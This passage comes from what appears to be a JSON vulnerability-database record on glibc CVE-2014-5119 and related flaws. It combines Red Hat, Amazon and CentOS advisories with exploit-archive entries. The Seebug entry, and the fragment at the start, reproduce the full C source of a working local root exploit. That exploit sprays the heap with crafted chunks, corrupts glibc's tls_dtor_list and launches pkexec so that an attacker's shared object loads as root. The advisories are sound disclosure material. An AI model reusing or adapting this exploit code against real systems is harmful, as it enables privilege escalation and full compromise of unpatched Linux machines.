= NULL;\r\n mchunk_t chunk = {\r\n .prev_size = 0xCCCCCCCC,\r\n .size = 0xDDDDDDDD,\r\n .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,\r\n 
.bk_nextsize = baseaddr + 8,\r\n };\r\n \r\n // Compensate for heap metadata every 1MB of allocations.\r\n chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);\r\n \r\n if (chunkaddr < heap_chunk_start)\r\n continue;\r\n \r\n if (chunkaddr > heap_chunk_end)\r\n break;\r\n \r\n chunkpageoffset = chunkaddr & ~PAGE_MASK;\r\n \r\n if (chunkpageoffset > targetpageoffset) {\r\n continue;\r\n }\r\n \r\n if (targetpageoffset - chunkpageoffset > chunksize) {\r\n continue;\r\n }\r\n \r\n // Looks like this will fit, compensate the pointers for alignment.\r\n chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);\r\n \r\n if (memchr(&chunk, 0, sizeof chunk)) {\r\n logmessage(LOG_WARN, \"parameter %u would contain a nul, skipping\", i);\r\n continue;\r\n }\r\n args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);\r\n \r\n memcpy(param + (targetpageoffset - chunkpageoffset),\r\n &chunk,\r\n sizeof chunk);\r\n }\r\n \r\n setrlimit(RLIMIT_STACK, &kRlimMax);\r\n setrlimit(RLIMIT_DATA, &kRlimMin);\r\n \r\n args[0] = \"pkexec\";\r\n \r\n logmessage(LOG_DEBUG, \"execvpe(%s...)...\", args[0]);\r\n execvpe(\"pkexec\", args, kCorruptCharsetEnviron);\r\n}\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22553"}], "redhat": [{"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn off-by-one heap-based buffer overflow flaw was found in glibc's internal\n__gconv_translit_find() function. 
An attacker able to make an application\ncall the iconv_open() function with a specially crafted argument could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. (CVE-2014-5119)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T11:55:25", "published": "2014-09-02T04:00:00", "id": "RHSA-2014:1118", "href": "https://access.redhat.com/errata/RHSA-2014:1118", "type": "redhat", "title": "(RHSA-2014:1118) Important: glibc security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:47:05", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name Server\nCaching Daemon (nscd) used by multiple programs on the system. Without\nthese libraries, the Linux system cannot function correctly.\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function\nconverted certain encoded data to UTF-8. An attacker able to make an\napplication call the iconv() function with a specially crafted argument\ncould use this flaw to crash that application. (CVE-2014-6040)\n\nIt was found that the files back end of Name Service Switch (NSS) did not\nisolate iteration over an entire database from key-based look-up API calls.\nAn application performing look-ups on a database while iterating over it\ncould enter an infinite loop, leading to a denial of service.\n(CVE-2014-8121)\n\nThis update also fixes the following bugs:\n\n* Due to problems with buffer extension and reallocation, the nscd daemon\nterminated unexpectedly with a segmentation fault when processing long\nnetgroup entries. 
With this update, the handling of long netgroup entries\nhas been corrected and nscd no longer crashes in the described scenario.\n(BZ#1138520)\n\n* If a file opened in append mode was truncated with the ftruncate()\nfunction, a subsequent ftell() call could incorrectly modify the file\noffset. This update ensures that ftell() modifies the stream state only\nwhen it is in append mode and the buffer for the stream is not empty.\n(BZ#1156331)\n\n* A defect in the C library headers caused builds with older compilers to\ngenerate incorrect code for the btowc() function in the older compatibility C++\nstandard library. Applications calling btowc() in the compatibility C++ standard\nlibrary became unresponsive. With this update, the C library headers have been\ncorrected, and the compatibility C++ standard library shipped with Red Hat\nEnterprise Linux has been rebuilt. Applications that rely on the compatibility\nC++ standard library no longer hang when calling btowc(). (BZ#1120490)\n\n* Previously, when using netgroups and the nscd daemon was set up to cache\nnetgroup information, the sudo utility denied access to valid users. The bug in\nnscd has been fixed, and sudo now works in netgroups as\nexpected. (BZ#1080766)\n\nUsers of glibc are advised to upgrade to these updated packages, which fix these\nissues.\n", "modified": "2018-04-12T03:33:28", "published": "2015-03-05T05:00:00", "id": "RHSA-2015:0327", "href": "https://access.redhat.com/errata/RHSA-2015:0327", "type": "redhat", "title": "(RHSA-2015:0327) Moderate: glibc security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:45:24", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name Server\nCaching Daemon (nscd) used by multiple programs on the system. 
Without\nthese libraries, the Linux system cannot function correctly.\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function\nconverted certain encoded data to UTF-8. An attacker able to make an\napplication call the iconv() function with a specially crafted argument\ncould use this flaw to crash that application. (CVE-2014-6040)\n\nIt was found that the wordexp() function would perform command substitution\neven when the WRDE_NOCMD flag was specified. An attacker able to provide\nspecially crafted input to an application using the wordexp() function, and\nnot sanitizing the input correctly, could potentially use this flaw to\nexecute arbitrary commands with the credentials of the user running that\napplication. (CVE-2014-7817)\n\nThe CVE-2014-7817 issue was discovered by Tim Waugh of the Red Hat\nDeveloper Experience Team.\n\nThis update also fixes the following bugs:\n\n* Previously, when an address lookup using the getaddrinfo() function for\nthe AF_UNSPEC value was performed on a defective DNS server, the server in\nsome cases responded with a valid response for the A record, but a referral\nresponse for the AAAA record, which resulted in a lookup failure. A prior\nupdate was implemented for getaddrinfo() to return the valid response, but\nit contained a typographical error, due to which the lookup could under\nsome circumstances still fail. This error has been corrected and\ngetaddrinfo() now returns a valid response in the described circumstances.\n(BZ#1172023)\n\n* An error in the dlopen() library function previously caused recursive\ncalls to dlopen() to terminate unexpectedly or to abort with a library\nassertion. This error has been fixed and recursive calls to dlopen() no\nlonger crash or abort. 
(BZ#1173469)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n", "modified": "2018-06-06T20:24:20", "published": "2015-01-07T05:00:00", "id": "RHSA-2015:0016", "href": "https://access.redhat.com/errata/RHSA-2015:0016", "type": "redhat", "title": "(RHSA-2015:0016) Moderate: glibc security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:45:19", "bulletinFamily": "unix", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn off-by-one heap-based buffer overflow flaw was found in glibc's internal\n__gconv_translit_find() function. An attacker able to make an application\ncall the iconv_open() function with a specially crafted argument could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. (CVE-2014-5119)\n\nA directory traversal flaw was found in the way glibc loaded locale files.\nAn attacker able to make an application use a specially crafted locale name\nvalue (for example, specified in an LC_* environment variable) could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. 
(CVE-2014-0475)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-0475.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n", "modified": "2018-06-06T20:24:08", "published": "2014-08-29T04:00:00", "id": "RHSA-2014:1110", "href": "https://access.redhat.com/errata/RHSA-2014:1110", "type": "redhat", "title": "(RHSA-2014:1110) Important: glibc security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2019-05-29T17:22:50", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nAn off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-devel-2.17-55.85.amzn1.i686 \n glibc-2.17-55.85.amzn1.i686 \n glibc-utils-2.17-55.85.amzn1.i686 \n nscd-2.17-55.85.amzn1.i686 \n glibc-headers-2.17-55.85.amzn1.i686 \n glibc-debuginfo-common-2.17-55.85.amzn1.i686 \n glibc-static-2.17-55.85.amzn1.i686 \n glibc-common-2.17-55.85.amzn1.i686 \n glibc-debuginfo-2.17-55.85.amzn1.i686 \n \n src: \n glibc-2.17-55.85.amzn1.src \n \n x86_64: \n glibc-debuginfo-2.17-55.85.amzn1.x86_64 \n glibc-common-2.17-55.85.amzn1.x86_64 \n glibc-utils-2.17-55.85.amzn1.x86_64 \n glibc-2.17-55.85.amzn1.x86_64 \n glibc-static-2.17-55.85.amzn1.x86_64 \n glibc-debuginfo-common-2.17-55.85.amzn1.x86_64 \n glibc-headers-2.17-55.85.amzn1.x86_64 \n nscd-2.17-55.85.amzn1.x86_64 \n glibc-devel-2.17-55.85.amzn1.x86_64 \n \n \n", "modified": "2014-09-19T11:57:00", "published": "2014-09-19T11:57:00", "id": "ALAS-2014-399", "href": 
"https://alas.aws.amazon.com/ALAS-2014-399.html", "title": "Important: glibc", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:22:33", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application. ([CVE-2014-6040 __](<https://access.redhat.com/security/cve/CVE-2014-6040>))\n\nIt was found that the wordexp() function would perform command substitution even when the WRDE_NOCMD flag was specified. An attacker able to provide specially crafted input to an application using the wordexp() function, and not sanitizing the input correctly, could potentially use this flaw to execute arbitrary commands with the credentials of the user running that application. ([CVE-2014-7817 __](<https://access.redhat.com/security/cve/CVE-2014-7817>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-common-2.17-55.92.amzn1.i686 \n glibc-devel-2.17-55.92.amzn1.i686 \n glibc-debuginfo-2.17-55.92.amzn1.i686 \n glibc-utils-2.17-55.92.amzn1.i686 \n glibc-debuginfo-common-2.17-55.92.amzn1.i686 \n nscd-2.17-55.92.amzn1.i686 \n glibc-static-2.17-55.92.amzn1.i686 \n glibc-headers-2.17-55.92.amzn1.i686 \n glibc-2.17-55.92.amzn1.i686 \n \n src: \n glibc-2.17-55.92.amzn1.src \n \n x86_64: \n glibc-2.17-55.92.amzn1.x86_64 \n glibc-utils-2.17-55.92.amzn1.x86_64 \n nscd-2.17-55.92.amzn1.x86_64 \n glibc-headers-2.17-55.92.amzn1.x86_64 \n glibc-static-2.17-55.92.amzn1.x86_64 \n glibc-debuginfo-2.17-55.92.amzn1.x86_64 \n glibc-debuginfo-common-2.17-55.92.amzn1.x86_64 \n glibc-common-2.17-55.92.amzn1.x86_64 \n glibc-devel-2.17-55.92.amzn1.x86_64 \n \n \n", "modified": 
"2015-01-08T12:40:00", "published": "2015-01-08T12:40:00", "id": "ALAS-2015-468", "href": "https://alas.aws.amazon.com/ALAS-2015-468.html", "title": "Medium: glibc", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:22:33", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application. ([CVE-2014-6040 __](<https://access.redhat.com/security/cve/CVE-2014-6040>))\n\nIt was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service. ([CVE-2014-8121 __](<https://access.redhat.com/security/cve/CVE-2014-8121>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-2.17-55.139.amzn1.i686 \n glibc-common-2.17-55.139.amzn1.i686 \n glibc-static-2.17-55.139.amzn1.i686 \n glibc-devel-2.17-55.139.amzn1.i686 \n glibc-headers-2.17-55.139.amzn1.i686 \n glibc-debuginfo-common-2.17-55.139.amzn1.i686 \n glibc-debuginfo-2.17-55.139.amzn1.i686 \n glibc-utils-2.17-55.139.amzn1.i686 \n nscd-2.17-55.139.amzn1.i686 \n \n src: \n glibc-2.17-55.139.amzn1.src \n \n x86_64: \n glibc-debuginfo-2.17-55.139.amzn1.x86_64 \n glibc-devel-2.17-55.139.amzn1.x86_64 \n glibc-headers-2.17-55.139.amzn1.x86_64 \n nscd-2.17-55.139.amzn1.x86_64 \n glibc-common-2.17-55.139.amzn1.x86_64 \n glibc-2.17-55.139.amzn1.x86_64 \n glibc-static-2.17-55.139.amzn1.x86_64 \n glibc-utils-2.17-55.139.amzn1.x86_64 \n glibc-debuginfo-common-2.17-55.139.amzn1.x86_64 \n \n \n", 
"modified": "2015-03-23T08:55:00", "published": "2015-03-23T08:55:00", "id": "ALAS-2015-495", "href": "https://alas.aws.amazon.com/ALAS-2015-495.html", "title": "Medium: glibc", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:13:33", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-09-04T00:00:00", "published": "2014-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87222", "id": "SSV:87222", "type": "seebug", "title": "glibc Off-by-One NUL Byte gconv_translit_find Exploit", "sourceData": "\n //\r\n// Full Exploit: http://www.exploit-db.com/sploits/CVE-2014-5119.tar.gz\r\n//\r\n//\r\n// ---------------------------------------------------\r\n// CVE-2014-5119 glibc __gconv_translit_find() exploit\r\n// ------------------------ taviso & scarybeasts -----\r\n//\r\n// Tavis Ormandy <taviso@cmpxhg8b.com>\r\n// Chris Evans <scarybeasts@gmail.com>\r\n//\r\n// Monday 25th August, 2014\r\n//\r\n \r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <dlfcn.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n#include <stdarg.h>\r\n#include <stddef.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <stdbool.h>\r\n#include <sys/user.h>\r\n#include <sys/stat.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n#include <sys/resource.h>\r\n \r\n// Minimal environment to trigger corruption in __gconv_translit_find().\r\nstatic char * const kCorruptCharsetEnviron[] = {\r\n "CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",\r\n NULL,\r\n};\r\n \r\nstatic const struct rlimit kRlimMax = {\r\n .rlim_cur = RLIM_INFINITY,\r\n .rlim_max = RLIM_INFINITY,\r\n};\r\n \r\nstatic const 
struct rlimit kRlimMin = {\r\n .rlim_cur = 1,\r\n .rlim_max = 1,\r\n};\r\n \r\n// A malloc chunk header.\r\ntypedef struct {\r\n size_t prev_size;\r\n size_t size;\r\n uintptr_t fd;\r\n uintptr_t bk;\r\n uintptr_t fd_nextsize;\r\n uintptr_t bk_nextsize;\r\n} mchunk_t;\r\n \r\n// A tls_dtor_list node.\r\ntypedef struct {\r\n uintptr_t func;\r\n uintptr_t obj;\r\n uintptr_t map;\r\n uintptr_t next;\r\n} dlist_t;\r\n \r\n// The known_trans structure glibc uses for transliteration modules.\r\ntypedef struct {\r\n uint8_t info[32];\r\n char *fname;\r\n void *handle;\r\n int open_count;\r\n} known_t;\r\n \r\nenum {\r\n LOG_DEBUG,\r\n LOG_WARN,\r\n LOG_ERROR,\r\n LOG_FATAL,\r\n};\r\n \r\n// Round up an integer to the next PAGE_SIZE boundary.\r\nstatic inline uintptr_t next_page_size(uintptr_t size)\r\n{\r\n return (size + PAGE_SIZE - 1) & PAGE_MASK;\r\n}\r\n \r\n// Allocate a buffer of specified length, starting with s, containing c, terminated with t.\r\nstatic void * alloc_repeated_string(size_t length, int s, int c, int t)\r\n{\r\n return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);\r\n}\r\n \r\nstatic void logmessage(int level, const char * format, ...)\r\n{\r\n va_list ap;\r\n \r\n switch (level) {\r\n case LOG_DEBUG: fprintf(stderr, "[*] "); break;\r\n case LOG_WARN: fprintf(stderr, "[*] "); break;\r\n case LOG_ERROR: fprintf(stderr, "[!] "); break;\r\n }\r\n \r\n va_start(ap, format);\r\n vfprintf(stderr, format, ap);\r\n va_end(ap);\r\n \r\n fputc('\\n', stderr);\r\n \r\n if (level == LOG_ERROR) {\r\n _exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\n// Parse a libc malloc assertion message to extract useful pointers.\r\n//\r\n// Note, this isn't to defeat ASLR, it just makes it more portable across\r\n// different system configurations. 
ASLR is already nullified using rlimits,\r\n// although technically even that isn't necessary.\r\nstatic int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr)\r\n{\r\n FILE *pty;\r\n char *mallocerror;\r\n char *memorymap;\r\n char *line;\r\n char *prev;\r\n char message[1 << 14];\r\n char *anon = NULL;\r\n char r, w, x, s;\r\n ssize_t count;\r\n int status;\r\n uintptr_t mapstart;\r\n uintptr_t mapend;\r\n \r\n // Unfortunately, glibc writes it's error messaged to /dev/tty. This cannot\r\n // be changed in setuid programs, so this wrapper catches tty output.\r\n while (true) {\r\n // Reset any previous output.\r\n memset(message, 0, sizeof message);\r\n \r\n logmessage(LOG_DEBUG, "Attempting to invoke pseudo-pty helper (this will take a few seconds)...");\r\n \r\n if ((pty = popen("./pty", "r")) == NULL) {\r\n logmessage(LOG_ERROR, "failed to execute pseudo-pty helper utility, cannot continue");\r\n }\r\n \r\n if ((count = fread(message, 1, sizeof message, pty)) <= 0) {\r\n logmessage(LOG_ERROR, "failed to read output from pseudo-pty helper, %d (%m)", count, message);\r\n }\r\n \r\n logmessage(LOG_DEBUG, "Read %u bytes of output from pseudo-pty helper, parsing...", count);\r\n \r\n pclose(pty);\r\n \r\n mallocerror = strstr(message, "corrupted double-linked list");\r\n memorymap = strstr(message, "======= Memory map: ========");\r\n \r\n // Unfortunately this isn't reliable, keep trying until it works.\r\n if (mallocerror == NULL || memorymap == NULL) {\r\n logmessage(LOG_WARN, "expected output missing (this is normal), trying again...");\r\n continue;\r\n }\r\n \r\n logmessage(LOG_DEBUG, "pseudo-pty helper succeeded");\r\n break;\r\n }\r\n \r\n *baseaddr = 0;\r\n *chunkptr = 0;\r\n *bssaddr = 0;\r\n *libcaddr = 0;\r\n \r\n logmessage(LOG_DEBUG, "attempting to parse libc fatal error message...");\r\n \r\n // Verify this is a message we understand.\r\n if (!mallocerror || !memorymap) {\r\n logmessage(LOG_ERROR, 
"unable to locate required error messages in crash dump");\r\n }\r\n \r\n // First, find the chunk pointer that malloc doesn't like\r\n if (sscanf(mallocerror, "corrupted double-linked list: %p ***", chunkptr) != 1) {\r\n logmessage(LOG_ERROR, "having trouble parsing this error message: %.20s", mallocerror);\r\n };\r\n \r\n logmessage(LOG_DEBUG, "discovered chunk pointer from `%.20s...`, => %p", mallocerror, *chunkptr);\r\n logmessage(LOG_DEBUG, "attempting to parse the libc maps dump...");\r\n \r\n // Second, parse maps.\r\n for (prev = line = memorymap; line = strtok(line, "\\n"); prev = line, line = NULL) {\r\n char filename[32];\r\n \r\n // Reset filename.\r\n memset(filename, 0, sizeof filename);\r\n \r\n // Just ignore the banner printed by glibc.\r\n if (strcmp(line, "======= Memory map: ========") == 0) {\r\n continue;\r\n }\r\n \r\n if (sscanf(line, "%08x-%08x %c%c%c%c %*8x %*s %*u %31s", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {\r\n // Record the last seen anonymous map, in case the kernel didn't tag the heap.\r\n if (strlen(filename) == 0) {\r\n anon = line;\r\n }\r\n \r\n // If the kernel did tag the heap, then everything is easy.\r\n if (strcmp(filename, "[heap]") == 0) {\r\n logmessage(LOG_DEBUG, "successfully located first morecore chunk w/tag @%p", mapstart);\r\n *baseaddr = mapstart;\r\n }\r\n \r\n // If it didn't tag the heap, then we need the anonymous chunk before the stack.\r\n if (strcmp(filename, "[stack]") == 0 && !*baseaddr) {\r\n logmessage(LOG_WARN, "no [heap] tag was found, using heuristic...");\r\n if (sscanf(anon, "%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s", baseaddr, filename) < 1) {\r\n logmessage(LOG_ERROR, "expected to find heap location in line `%s`, but failed", anon);\r\n }\r\n logmessage(LOG_DEBUG, "located first morecore chunk w/o tag@%p", *baseaddr);\r\n }\r\n \r\n if (strcmp(filename, "/usr/lib/libc-2.18.so") == 0 && x == 'x') {\r\n logmessage(LOG_DEBUG, "found libc.so mapped @%p", mapstart);\r\n *libcaddr = 
mapstart;\r\n }\r\n \r\n // Try to find libc bss.\r\n if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {\r\n logmessage(LOG_DEBUG, "expecting libc.so bss to begin at %p", mapstart);\r\n *bssaddr = mapstart;\r\n }\r\n continue;\r\n }\r\n \r\n logmessage(LOG_ERROR, "unable to parse maps line `%s`, quiting", line);\r\n break;\r\n }\r\n \r\n return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0;\r\n}\r\n \r\nstatic const size_t heap_chunk_start = 0x506c8008;\r\nstatic const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);\r\n \r\nstatic const size_t nstrings = 15840000;\r\n \r\n// The offset into libc-2.18.so BSS of tls_dtor_list.\r\nstatic const uintptr_t kTlsDtorListOffset = 0x12d4;\r\n \r\n// The DSO we want to load as euid 0.\r\nstatic const char kExploitDso[] = "./exploit.so";\r\n \r\nint main(int argc, const char* argv[])\r\n{\r\n uintptr_t baseaddr;\r\n uintptr_t chunkptr;\r\n uintptr_t bssaddr;\r\n uintptr_t libcaddr;\r\n uint8_t *param;\r\n char **args;\r\n dlist_t *chain;\r\n struct utsname ubuf;\r\n \r\n // Look up host type.\r\n if (uname(&ubuf) != 0) {\r\n logmessage(LOG_ERROR, "failed to query kernel information");\r\n }\r\n \r\n logmessage(LOG_DEBUG, "---------------------------------------------------");\r\n logmessage(LOG_DEBUG, "CVE-2014-5119 glibc __gconv_translit_find() exploit");\r\n logmessage(LOG_DEBUG, "------------------------ taviso & scarybeasts -----");\r\n \r\n // Print some warning that this isn't going to work on Ubuntu.\r\n if (access("/etc/fedora-release", F_OK) != 0 || strcmp(ubuf.machine, "i686") != 0)\r\n logmessage(LOG_WARN, "This proof of concept is designed for 32 bit Fedora 20");\r\n \r\n // Extract some useful pointers from glibc error output.\r\n if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {\r\n logmessage(LOG_ERROR, "unable to parse libc fatal error message, please try again.");\r\n }\r\n \r\n logmessage(LOG_DEBUG, "allocating space for argument 
structure...");\r\n \r\n // This number of "-u" arguments is used to spray the heap.\r\n // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.\r\n // The value is just large enough to usuaully crash the heap into the stack without going OOM.\r\n if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {\r\n logmessage(LOG_ERROR, "allocating argument structure failed");\r\n }\r\n \r\n logmessage(LOG_DEBUG, "creating command string...");\r\n \r\n args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);\r\n args[nstrings * 2 + 2] = NULL;\r\n \r\n logmessage(LOG_DEBUG, "creating a tls_dtor_list node...");\r\n \r\n // The length 59 is chosen to cause a 64byte allocation by stdrup. That is\r\n // a 60 byte nul-terminated string, followed by 4 bytes of metadata.\r\n param = alloc_repeated_string(59, 'A', 'A', 0);\r\n chain = (void *) param;\r\n \r\n logmessage(LOG_DEBUG, "open_translit() symbol will be at %p", libcaddr + _OPEN_TRANSLIT_OFF);\r\n logmessage(LOG_DEBUG, "offsetof(struct known_trans, fname) => %u", offsetof(known_t, fname));\r\n \r\n chain->func = libcaddr + _OPEN_TRANSLIT_OFF;\r\n chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);\r\n chain->map = baseaddr + 8 + sizeof(*chain);\r\n chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);\r\n \r\n logmessage(LOG_DEBUG, "appending `%s` to list node", kExploitDso);\r\n \r\n memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);\r\n \r\n logmessage(LOG_DEBUG, "building parameter list...");\r\n for (int i = 0; i < nstrings; ++i) {\r\n args[i*2 + 1] = "-u";\r\n args[i*2 + 2] = (void *) chain;\r\n }\r\n \r\n // Verify we didn't sneak in a NUL.\r\n assert(memchr(chain, 0, sizeof(chain)) == NULL);\r\n \r\n logmessage(LOG_DEBUG, "anticipating tls_dtor_list to be at %p", bssaddr + kTlsDtorListOffset);\r\n \r\n // Spam all of possible chunks (some are unfortunately missed).\r\n for (int i = 0; true; i++) {\r\n uintptr_t chunksize 
= 64;\r\n uintptr_t chunkaddr = baseaddr + i * chunksize;\r\n uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;\r\n uintptr_t chunkpageoffset = PAGE_MASK;\r\n uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);\r\n uint8_t *param = NULL;\r\n mchunk_t chunk = {\r\n .prev_size = 0xCCCCCCCC,\r\n .size = 0xDDDDDDDD,\r\n .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,\r\n .bk_nextsize = baseaddr + 8,\r\n };\r\n \r\n // Compensate for heap metadata every 1MB of allocations.\r\n chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);\r\n \r\n if (chunkaddr < heap_chunk_start)\r\n continue;\r\n \r\n if (chunkaddr > heap_chunk_end)\r\n break;\r\n \r\n chunkpageoffset = chunkaddr & ~PAGE_MASK;\r\n \r\n if (chunkpageoffset > targetpageoffset) {\r\n continue;\r\n }\r\n \r\n if (targetpageoffset - chunkpageoffset > chunksize) {\r\n continue;\r\n }\r\n \r\n // Looks like this will fit, compensate the pointers for alignment.\r\n chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);\r\n \r\n if (memchr(&chunk, 0, sizeof chunk)) {\r\n logmessage(LOG_WARN, "parameter %u would contain a nul, skipping", i);\r\n continue;\r\n }\r\n args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);\r\n \r\n memcpy(param + (targetpageoffset - chunkpageoffset),\r\n &chunk,\r\n sizeof chunk);\r\n }\r\n \r\n setrlimit(RLIMIT_STACK, &kRlimMax);\r\n setrlimit(RLIMIT_DATA, &kRlimMin);\r\n \r\n args[0] = "pkexec";\r\n \r\n logmessage(LOG_DEBUG, "execvpe(%s...)...", args[0]);\r\n execvpe("pkexec", args, kCorruptCharsetEnviron);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87222", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0327\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math 
libraries (libm), and the Name Server\nCaching Daemon (nscd) used by multiple programs on the system. Without\nthese libraries, the Linux system cannot function correctly.\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function\nconverted certain encoded data to UTF-8. An attacker able to make an\napplication call the iconv() function with a specially crafted argument\ncould use this flaw to crash that application. (CVE-2014-6040)\n\nIt was found that the files back end of Name Service Switch (NSS) did not\nisolate iteration over an entire database from key-based look-up API calls.\nAn application performing look-ups on a database while iterating over it\ncould enter an infinite loop, leading to a denial of service.\n(CVE-2014-8121)\n\nThis update also fixes the following bugs:\n\n* Due to problems with buffer extension and reallocation, the nscd daemon\nterminated unexpectedly with a segmentation fault when processing long\nnetgroup entries. With this update, the handling of long netgroup entries\nhas been corrected and nscd no longer crashes in the described scenario.\n(BZ#1138520)\n\n* If a file opened in append mode was truncated with the ftruncate()\nfunction, a subsequent ftell() call could incorrectly modify the file\noffset. This update ensures that ftell() modifies the stream state only\nwhen it is in append mode and the buffer for the stream is not empty.\n(BZ#1156331)\n\n* A defect in the C library headers caused builds with older compilers to\ngenerate incorrect code for the btowc() function in the older compatibility C++\nstandard library. Applications calling btowc() in the compatibility C++ standard\nlibrary became unresponsive. With this update, the C library headers have been\ncorrected, and the compatibility C++ standard library shipped with Red Hat\nEnterprise Linux has been rebuilt. Applications that rely on the compatibility\nC++ standard library no longer hang when calling btowc(). 
